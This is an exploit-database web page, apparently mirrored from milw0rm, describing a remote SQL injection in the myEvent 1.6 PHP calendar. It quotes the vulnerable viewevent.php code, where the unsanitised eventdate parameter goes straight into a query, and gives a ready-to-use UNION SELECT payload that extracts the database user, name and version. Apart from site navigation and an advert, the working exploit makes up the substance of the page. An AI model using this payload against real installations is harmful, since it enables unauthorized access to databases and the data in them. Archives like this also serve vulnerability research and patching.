|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 4923 SecurityAlert : 4457 (Exploit Details) Milw0rm ID : 6760 Credit : JosS Date : 17.10.2008 Exploit Code : # myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability # url: http://mywebland.com/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Greetz To: All Hackers and milw0rm website vuln file: /viewevent.php vuln code: 43: if (isset($_GET['eventdate'])) xx: ... 93: $sql = "SELECT * FROM event WHERE date = '$eventdate'" ; 94: $results = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); 95: $event = mysql_num_rows($results); PoC: /viewevent.php?eventdate='[foo] Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),d atabase(),char(32,35),version())/* Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |